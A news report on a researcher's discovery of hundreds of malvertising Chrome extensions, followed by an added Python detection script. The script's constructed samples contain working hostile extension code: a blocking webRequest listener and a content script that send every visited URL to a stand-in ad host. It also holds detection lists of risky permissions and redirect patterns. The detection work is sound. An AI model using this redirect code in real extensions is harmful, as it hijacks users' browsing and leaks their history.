While doing routine threat-hunting work one day, security researcher Jamila Kaya stumbled across the first of a series of malicious Google Chrome extensions. That find sparked a two-month investigation and led Google to remove more than 500 extensions from its web store. By the time the investigation began, the extensions identified in her initial sweep had already been installed by more than 1.7 million Chrome users, which lent the work some urgency. The results have now been published in a report on what turned out to be a large malware operation that had been active for at least two years.
After her initial discovery, Kaya contacted the Duo Security team at Cisco, according to the report, about a set of Chrome extensions she had found that infected browsers and would “exfiltrate data as part of a larger campaign.”
“These extensions were commonly presented as offering advertising as a service,” the report notes. “Jamila discovered they were part of a network of copycat plugins sharing nearly identical functionality. Through collaboration, we were able to take the few dozen extensions and utilize CRXcavator.io to identify 70 matching their patterns across 1.7 million users and escalate concerns to Google.”
The Duo team goes on to explain that bad actors increasingly hide malicious behaviour inside legitimate-looking internet activity, and one of the most popular vehicles is online advertising: the cookies set by ad networks and the redirect chains that deliver ads. The technique, known as “malvertising,” is hard to detect precisely because the traffic looks like ordinary ad delivery. “Malvertising often occurs within other programs, acting as a vehicle for multiple forms of fraudulent activity, including ad-fraud, data exfiltration, phishing, and monitoring and exploitation,” the report continues. “Alternatively, it also emerges in multipart malicious campaigns that involve advertising collection and defraudment.”
The code in these extensions would sometimes redirect users to an affiliate link on retail sites such as Best Buy’s or Macy’s; other times the destination was a malware download site. The researchers said Google was responsive when they escalated the findings, and a Google spokesman said the company always takes action when the research community alerts it to extensions that violate its policies. Google added that it performs “regular sweeps to find extensions” that use comparable techniques, code, and behaviors.
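The report describes two things a defender can look for: extensions that redirect the browser through an advertising host, and copycat extensions whose code is nearly identical apart from names and domains. The script below is an added illustration of both checks, not code from the report, Duo, or CRXcavator. It runs a small static triage over unpacked extensions (a manifest plus its scripts): it flags permissions that let an extension intercept every request, searches the scripts for the code patterns through which a redirect can be issued, lists the external hosts referenced, and fingerprints each script set with comments stripped and string literals normalised so that copycats differing only in a swapped ad host hash to the same value. The three sample extensions, their names, hosts and scripts are all constructed for the example.

```python
# Added example: static triage of unpacked Chrome extensions for the redirect
# pattern described in the report. Extensions, names and hosts are constructed.
import hashlib
import re

# Permissions that let an extension observe or rewrite every request or tab.
RISKY_PERMISSIONS = {"webRequest", "webRequestBlocking", "tabs", "cookies", "<all_urls>"}

# Code patterns through which an extension can send the browser somewhere else.
REDIRECT_SINKS = {
    "webRequest redirectUrl": re.compile(r"\bredirectUrl\s*:"),
    "location assignment": re.compile(r"\b(?:window\.|document\.)?location(?:\.href)?\s*=[^=]"),
    "location.assign/replace": re.compile(r"\blocation\.(?:assign|replace)\s*\("),
    "tabs.update": re.compile(r"\bchrome\.tabs\.update\s*\("),
}
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

# One pass that recognises string literals (group 1) and comments (no group),
# so a "//" inside a URL string is never mistaken for the start of a comment.
TOKEN_RE = re.compile(
    r"""("(?:\\.|[^"\\\n])*"|'(?:\\.|[^'\\\n])*')|//[^\n]*|/\*.*?\*/""", re.S)


def fingerprint(js: str) -> str:
    """Hash of the code with comments removed, every string literal replaced by a
    placeholder and whitespace collapsed, so copycats that only swap names,
    domains or affiliate IDs produce the same value."""
    body = TOKEN_RE.sub(lambda m: '"S"' if m.group(1) else "", js)
    body = re.sub(r"\s+", "", body)
    return hashlib.sha256(body.encode()).hexdigest()[:16]


def triage(ext: dict) -> dict:
    """Indicators for one unpacked extension given as {"manifest": ..., "scripts": ...}."""
    perms = set(ext["manifest"].get("permissions", []))
    src = "\n".join(ext["scripts"].values())
    findings = {
        "risky_permissions": sorted(perms & RISKY_PERMISSIONS),
        "redirect_sinks": sorted(n for n, rx in REDIRECT_SINKS.items() if rx.search(src)),
        "external_hosts": sorted({m.group(1) for m in HOST_RE.finditer(src)}),
        "fingerprint": fingerprint(src),
    }
    # The combination matters: broad permissions plus a redirect sink aimed at an
    # external host is the malvertising shape the report describes.
    findings["suspicious"] = bool(findings["risky_permissions"]
                                  and findings["redirect_sinks"]
                                  and findings["external_hosts"])
    return findings


def copycat_families(exts: list) -> dict:
    """Group extensions whose normalised code is identical (lookalike hunting)."""
    families = {}
    for ext in exts:
        fp = fingerprint("\n".join(ext["scripts"].values()))
        families.setdefault(fp, []).append(ext["manifest"]["name"])
    return {fp: names for fp, names in families.items() if len(names) > 1}


# --- constructed samples ----------------------------------------------------
BG_TEMPLATE = """
// constructed sample: route every top-level navigation through an ad host
chrome.webRequest.onBeforeRequest.addListener(
  function (details) {
    if (details.type === "main_frame" && details.url.indexOf("__HOST__") === -1) {
      return { redirectUrl: "https://__HOST__/r?u=" + encodeURIComponent(details.url) };
    }
  },
  { urls: ["<all_urls>"] },
  ["blocking"]
);
"""
CS_TEMPLATE = """
// constructed sample: bounce the page once through an affiliate tracker
if (!sessionStorage.getItem("seen")) {
  sessionStorage.setItem("seen", "1");
  window.location.href = "https://__HOST__/aff?to=" + encodeURIComponent(location.href);
}
"""


def sample_extension(name: str, host: str) -> dict:
    return {
        "manifest": {"name": name, "manifest_version": 2,
                     "permissions": ["webRequest", "webRequestBlocking", "<all_urls>"]},
        "scripts": {"background.js": BG_TEMPLATE.replace("__HOST__", host),
                    "content.js": CS_TEMPLATE.replace("__HOST__", host)},
    }


BENIGN = {
    "manifest": {"name": "Plain Theme", "manifest_version": 2, "permissions": ["storage"]},
    "scripts": {"content.js": '// constructed sample: cosmetic tweak only\n'
                              'document.documentElement.style.setProperty("--accent", "#2a7");\n'},
}

# Two copycats that differ only in name and ad host, plus one benign extension.
SAMPLES = [sample_extension("Deal Finder Pro", "ads-a.example"),
           sample_extension("Coupon Saver Plus", "ads-b.example"),
           BENIGN]

if __name__ == "__main__":
    for ext in SAMPLES:
        print(ext["manifest"]["name"], triage(ext))
    print("copycat families:", copycat_families(SAMPLES))
```

The fingerprint is deliberately crude: it catches the “nearly identical functionality” case the report describes, where the same code is republished under new names with a different ad domain, but it will not match a copy that has been reordered or re-minified. Note also that a blocking `webRequest` hook of the kind in the sample sees the full URL of every page the user visits, which is why the same code that redirects for ad fraud can double as an exfiltration channel.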